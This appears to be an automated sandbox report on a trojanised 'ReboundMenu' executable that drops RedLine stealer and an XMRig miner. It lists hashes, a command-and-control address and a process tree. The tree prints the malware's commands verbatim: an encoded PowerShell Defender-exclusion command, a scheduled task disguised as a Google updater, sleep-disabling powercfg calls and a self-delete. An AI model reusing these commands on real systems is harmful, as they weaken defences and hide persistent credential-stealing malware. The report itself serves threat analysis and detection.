Analysis

max time kernel:  151s
max time network: 138s
platform:         windows10-2004_x64
resource:         win10v2004-20220414-en
submitted:        15-04-2022 07:10

Static task: static1

Behavioral task: behavioral1
  Sample:   ReboundMenu_V4.15.3.exe
  Resource: win7-20220414-en

Behavioral task: behavioral2
  Sample:   ReboundMenu_V4.15.3.exe
  Resource: win10v2004-20220414-en
General

Target: ReboundMenu_V4.15.3.exe
Size:   1.7MB
MD5:    11bee17705209c6aa6789c93d3789eaa
SHA1:   93098eab6c80fbd80d538385d1fafc5dd20500b2
SHA256: 484525c831d15dfb80c4355a6995f331a15e3a3bdeea43746e5d4000a16b27e6
SHA512: b0bedfb38d641d0667dd14161f36bd3a16b80dbd54be9840cad88d04d97385334cd112176456f923b5e443d13b43227f5229a7ade644c1048ec704eb71de2fd2
Malware Config

Extracted: redline
  185.186.142.127:6737
  auth_value: 69a1f5b6b455ba880252fbfe1168b351
Signatures

Meta Stealer Stealer
  Meta Stealer steals passwords stored in browsers, written in C++.

RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (1 IoC)
  resource                                                                      yara_rule
  behavioral2/memory/1600-133-0x0000000000380000-0x00000000003A0000-memory.dmp  family_redline

XMRig Miner Payload (5 IoCs)
  resource                                                                      yara_rule
  behavioral2/memory/3824-199-0x000000014036DAD4-mapping.dmp                    xmrig
  behavioral2/memory/3824-198-0x0000000140000000-0x0000000140803000-memory.dmp  xmrig
  behavioral2/memory/3824-200-0x0000000140000000-0x0000000140803000-memory.dmp  xmrig
  behavioral2/memory/3824-201-0x0000000140000000-0x0000000140803000-memory.dmp  xmrig
  behavioral2/memory/3824-203-0x0000000140000000-0x0000000140803000-memory.dmp  xmrig

Downloads MZ/PE file

Executes dropped EXE (2 IoCs)
  pid   Process
  2616  fl.exe
  1944  charme.exe

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Suspicious use of SetThreadContext (3 IoCs)
  description                          pid   Process                  procid_target
  PID 2996 set thread context of 1600  2996  ReboundMenu_V4.15.3.exe  80
  PID 3032 set thread context of 3812  3032  conhost.exe              108
  PID 3032 set thread context of 3824  3032  conhost.exe              112

Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   Process
  2884  schtasks.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs; repeated pid/process entries collapsed)
  pid   Process
  1600  AppLaunch.exe
  4568  powershell.exe
  408   conhost.exe
  4468  powershell.exe
  3032  conhost.exe
  3824  explorer.exe

Suspicious behavior: LoadsDriver (1 IoC)
  pid  Process
  648  Process not Found

Suspicious use of AdjustPrivilegeToken (23 IoCs)
  description                                            pid   Process
  Token: SeDebugPrivilege                                1600  AppLaunch.exe
  Token: SeDebugPrivilege                                4568  powershell.exe
  Token: SeDebugPrivilege                                408   conhost.exe
  Token: SeShutdownPrivilege, SeCreatePagefilePrivilege  2636  powercfg.exe
  Token: SeShutdownPrivilege, SeCreatePagefilePrivilege  4968  powercfg.exe
  Token: SeShutdownPrivilege, SeCreatePagefilePrivilege  4224  powercfg.exe
  Token: SeShutdownPrivilege, SeCreatePagefilePrivilege  3260  powercfg.exe
  Token: SeDebugPrivilege                                4468  powershell.exe
  Token: SeDebugPrivilege                                3032  conhost.exe
  Token: SeShutdownPrivilege, SeCreatePagefilePrivilege  1040  powercfg.exe
  Token: SeShutdownPrivilege, SeCreatePagefilePrivilege  4384  powercfg.exe
  Token: SeShutdownPrivilege, SeCreatePagefilePrivilege  4452  powercfg.exe
  Token: SeShutdownPrivilege, SeCreatePagefilePrivilege  1932  powercfg.exe
  Token: SeLockMemoryPrivilege                           3824  explorer.exe
Suspicious use of WriteProcessMemory (64 IoCs; repeated entries collapsed)
  pid   Process                  wrote to memory of  procid_target
  2996  ReboundMenu_V4.15.3.exe  1600                80
  1600  AppLaunch.exe            2616                81
  2616  fl.exe                   408                 82
  408   conhost.exe              4640                83
  4640  cmd.exe                  4568                85
  408   conhost.exe              5100                86
  5100  cmd.exe                  2636                88
  5100  cmd.exe                  4968                89
  5100  cmd.exe                  4224                90
  5100  cmd.exe                  3260                91
  408   conhost.exe              5080                92
  5080  cmd.exe                  2884                94
  408   conhost.exe              5096                95
  408   conhost.exe              4044                97
  4044  cmd.exe                  4164                99
  5096  cmd.exe                  1944                100
  1944  charme.exe               3032                101
  3032  conhost.exe              5024                102
  5024  cmd.exe                  4468                104
  3032  conhost.exe              3840                105
  3840  cmd.exe                  1040                107
  3032  conhost.exe              3812                108
  3840  cmd.exe                  4384                109
  3840  cmd.exe                  4452                110
  3840  cmd.exe                  1932                111
  3032  conhost.exe              3824                112
Processes

Process tree (indentation shows parent/child depth; each node lists image path, command line, PID and triggered signatures):

C:\Users\Admin\AppData\Local\Temp\ReboundMenu_V4.15.3.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\ReboundMenu_V4.15.3.exe"
  PID: 2996
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      PID: 1600
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Local\Temp\fl.exe
          cmdline: "C:\Users\Admin\AppData\Local\Temp\fl.exe"
          PID: 2616
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory

            C:\Windows\System32\conhost.exe
              cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\fl.exe"
              PID: 408
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of WriteProcessMemory

                C:\Windows\System32\cmd.exe
                  cmdline: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGIAdQBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAcgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AHkAIwA+AA=="
                  PID: 4640
                  - Suspicious use of WriteProcessMemory

                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      cmdline: powershell -EncodedCommand "PAAjAGIAdQBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAcgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AHkAIwA+AA=="
                      PID: 4568
                      - Suspicious behavior: EnumeratesProcesses
                      - Suspicious use of AdjustPrivilegeToken

                C:\Windows\System32\cmd.exe
                  cmdline: "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                  PID: 5100
                  - Suspicious use of WriteProcessMemory

                    C:\Windows\system32\powercfg.exe
                      cmdline: powercfg /x -hibernate-timeout-ac 0
                      PID: 2636
                      - Suspicious use of AdjustPrivilegeToken

                    C:\Windows\system32\powercfg.exe
                      cmdline: powercfg /x -hibernate-timeout-dc 0
                      PID: 4968
                      - Suspicious use of AdjustPrivilegeToken

                    C:\Windows\system32\powercfg.exe
                      cmdline: powercfg /x -standby-timeout-ac 0
                      PID: 4224
                      - Suspicious use of AdjustPrivilegeToken

                    C:\Windows\system32\powercfg.exe
                      cmdline: powercfg /x -standby-timeout-dc 0
                      PID: 3260
                      - Suspicious use of AdjustPrivilegeToken

                C:\Windows\System32\cmd.exe
                  cmdline: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachine" /tr "C:\Users\Admin\AppData\Roaming\charme.exe"
                  PID: 5080
                  - Suspicious use of WriteProcessMemory

                    C:\Windows\system32\schtasks.exe
                      cmdline: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachine" /tr "C:\Users\Admin\AppData\Roaming\charme.exe"
                      PID: 2884
                      - Creates scheduled task(s)

                C:\Windows\System32\cmd.exe
                  cmdline: "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\charme.exe"
                  PID: 5096
                  - Suspicious use of WriteProcessMemory

                    C:\Users\Admin\AppData\Roaming\charme.exe
                      cmdline: C:\Users\Admin\AppData\Roaming\charme.exe
                      PID: 1944
                      - Executes dropped EXE
                      - Suspicious use of WriteProcessMemory

                        C:\Windows\System32\conhost.exe
                          cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\charme.exe"
                          PID: 3032
                          - Suspicious use of SetThreadContext
                          - Suspicious behavior: EnumeratesProcesses
                          - Suspicious use of AdjustPrivilegeToken
                          - Suspicious use of WriteProcessMemory

                            C:\Windows\System32\cmd.exe
                              cmdline: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGIAdQBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAcgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AHkAIwA+AA=="
                              PID: 5024
                              - Suspicious use of WriteProcessMemory

                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  cmdline: powershell -EncodedCommand "PAAjAGIAdQBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAcgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AHkAIwA+AA=="
                                  PID: 4468
                                  - Suspicious behavior: EnumeratesProcesses
                                  - Suspicious use of AdjustPrivilegeToken

                            C:\Windows\System32\cmd.exe
                              cmdline: "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                              PID: 3840
                              - Suspicious use of WriteProcessMemory

                                C:\Windows\system32\powercfg.exe
                                  cmdline: powercfg /x -hibernate-timeout-ac 0
                                  PID: 1040
                                  - Suspicious use of AdjustPrivilegeToken

                                C:\Windows\system32\powercfg.exe
                                  cmdline: powercfg /x -hibernate-timeout-dc 0
                                  PID: 4384
                                  - Suspicious use of AdjustPrivilegeToken

                                C:\Windows\system32\powercfg.exe
                                  cmdline: powercfg /x -standby-timeout-ac 0
                                  PID: 4452
                                  - Suspicious use of AdjustPrivilegeToken

                                C:\Windows\system32\powercfg.exe
                                  cmdline: powercfg /x -standby-timeout-dc 0
                                  PID: 1932
                                  - Suspicious use of AdjustPrivilegeToken

                            C:\Windows\System32\conhost.exe
                              cmdline: C:\Windows\System32\conhost.exe
                              PID: 3812

                                C:\Windows\System32\conhost.exe
                                  cmdline: "C:\Windows\System32\conhost.exe" "vtowhpjpnxwsrik"
                                  PID: 2168

                            C:\Windows\explorer.exe
                              cmdline: C:\Windows\explorer.exe aumdnvyddh1 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJS6kTcb2sZJ49Q3iSMDc1H0o0uNnhRclY6DcoQfJIkPc5ubji/PYICTS6YCivJp16OXyHB+WvLzMf4KQTl36jWiAqpPFFwujek1VkP9II8fKxesKjZLxzwmF/WZ/I0WqoFl0CEzXLG/No5YgMHiLom87fH1KSo63FDBNUmQTm7iowsSG1tGhG8IaKfn4rIMLuc7r5qhutURjZI+9zW3DqmPoFP+3nbkrxLDRxtRUmBHDH81T8M7FlEgSc+nu8grKK292smbuRhMgyC/0SqFZGS+/LDXdJhFimn5YqYVKsb9TjZV1tR8NqBhbVh1eRLowkab/dPtfJ0IiWdptcw7y0THB2KUFt7gaTNiYsAxIllIrSD9XeH8ilKRC1AuYRpU7G6PE1ZlfQNPkEnQ5T8ZDbZ/
                              PID: 3824
                              - Suspicious behavior: EnumeratesProcesses
                              - Suspicious use of AdjustPrivilegeToken

                C:\Windows\System32\cmd.exe
                  cmdline: "C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\fl.exe"
                  PID: 4044
                  - Suspicious use of WriteProcessMemory

                    C:\Windows\system32\choice.exe
                      cmdline: choice /C Y /N /D Y /T 3
                      PID: 4164
Downloads

Filesize: 443B
  MD5:    8add56521ef894ef0c66ecd3e989d718
  SHA1:   2058aa5185fd5dcce7263bef8fe35bf5e12dbc7f
  SHA256: 01bcb6c8348b83208a7c923fd840130a0bc7b3a188b62ad8e270a296ed94b724
  SHA512: af99971664282617c18db6a27ddb3bf57eaa291d79ef66828319de3eb38533cc813f7d322cc4c9e687aa90b5c91b7874ed8e725c3cfe35e139e0581492caefb2

Filesize: 944B
  MD5:    6d42b6da621e8df5674e26b799c8e2aa
  SHA1:   ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
  SHA256: 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
  SHA512: 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Filesize: 4.1MB (listed four times in the original report with identical hashes)
  MD5:    798fa001d694999cda269d3af437dbbc
  SHA1:   22598970ba604e9b03475af8a7cab96408fb6547
  SHA256: 5270d7b5223813844514fb7cec6afa889d365aee01ea4307be094cd1b4bbbe46
  SHA512: 8e69521c43235d308be0a20bd67e867ee3cd1fe3ad335dc83586a5af169e50addff8f04d70ae95680739582459c88909f12623897de0e2827d0d6ff488ffadf7